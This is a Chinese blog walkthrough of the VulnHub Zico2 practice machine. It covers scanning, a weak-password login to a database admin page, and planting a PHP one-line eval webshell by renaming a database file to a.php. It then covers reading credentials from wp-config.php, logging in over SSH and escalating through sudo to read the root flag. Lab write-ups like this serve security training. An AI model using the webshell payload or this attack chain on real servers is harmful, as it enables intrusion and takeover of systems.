【vulnhub】Zico2靶机

信息收集

靶机IP发现

进行端口扫描,发现开放了22(ssh),80(http)和111(rpcbind)端口。

进行目录扫描

dirsearch -u http://192.168.93.152

网址IP访问

后面拼接/dbadmin/目录

用弱口令admin尝试,发现登陆成功

获取shell

在这个后台发现可以写入webshell,首先创建一个数据库

创建一个表

设置一个字段名称,类型为text

在该表中写入一句话木马。

<?php @eval($_POST["a"]);?>

这个木马文件我们现在还访问不到,因为这个目录我们访问不到,所以我们需要通过改名来移动文件到可以访问的位置。

将原来的/usr/databases/www改为 a.php。此处不要使用绝对路径,需要使用相对路径。此处使用相对路径,数据库文件就会移动到当前管理页面的同级目录中,也就是 /dbadmin/中。

访问 http://192.168.93.152/dbadmin/,发现a.php已经存在这个目录中了。

进行蚁剑连接

提权

查找靶机中有没有存在敏感信息。最终在家目录中wordpress中的配置文件wp-config.php中找到了zico账号和密码 sWfCsfJSPV9H3AmQzw8。

尝试用ssh登录

ssh zico@192.168.93.152

sudo 提权

sudo -l

通过tar提权

通过zip提权

读取flag

cat /root/flag.txt

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值